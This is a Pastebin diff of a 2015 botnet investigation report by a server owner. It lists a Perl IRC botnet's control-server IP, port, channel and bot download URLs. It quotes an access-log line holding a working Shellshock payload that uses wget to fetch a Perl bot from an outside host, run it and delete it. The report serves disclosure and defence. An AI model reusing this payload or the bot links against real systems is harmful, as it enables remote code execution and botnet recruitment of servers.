SHOW:
|
|
- or go back to the newest paste.
1 | http://pastebin.com/SPMkyZ4w - saga continues.. (: | |
2 | _____________________________________ | |
3 | [```` BOTNET INVESTIGATION REPORT ````] | |
4 | ````````````````````````````````````` | |
5 | ||
6 | - | Date: January 06, 2015 |
6 | + | Date: January 16, 2015 |
7 | Botnet type: IRC Bots/Malware | |
8 | Botnet control server IP: 64.32.12.57 (Sharktech.net) | |
9 | Protocol: IRC | |
10 | Port: 80 ( /connect 64.32.12.57 80 -j #new ) | |
11 | Hacked hosts: >500 | |
12 | Previous report of the same botnet: http://pastebin.com/DabxDiwm , http://pastebin.com/SPMkyZ4w | |
13 | Bot url: http://74.208.166.12/bot.txt (mirror: http://pastebin.com/Zbkke58A) | |
14 | (u17173405.onlinehome-server.com Numerical: 74.208.166.12) | |
15 | ||
16 | Access log: | |
17 | 217.114.212.26 - - [16/Jan/2015:15:46:35 -0500] "GET /phppath/cgi_wrapper HTTP/1.0" 404 162 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESSX\x22;system(\x22wget http://74.208.166.12/bot.txt -O /tmp/bot.pl;perl /tmp/bot.pl;rm -rf /tmp/bot.pl\x22);'" | |
18 | ||
19 | ||
20 | We can clearly see that this is a shell-shock exploitation try and the source code is here: | |
21 | http://74.208.166.12/bot.txt ( MIRROR: http://pastebin.com/Zbkke58A ) | |
22 | ||
23 | From the source code we can clearly see that this is an IRC bot that connects to a following server: | |
24 | $servidor='64.32.12.57' unless $servidor; | |
25 | my $porta='80'; | |
26 | my @canais=("#new"); | |
27 | my @adms=("X","Y"); | |
28 | my @auth=("*!*@evil"); | |
29 | ||
30 | Hey, whoever you are, it's a third time I reporting you to the public, maybe you'll stop attacking my server? I see you are enjoying everyone using your botnet :-) Good luck. |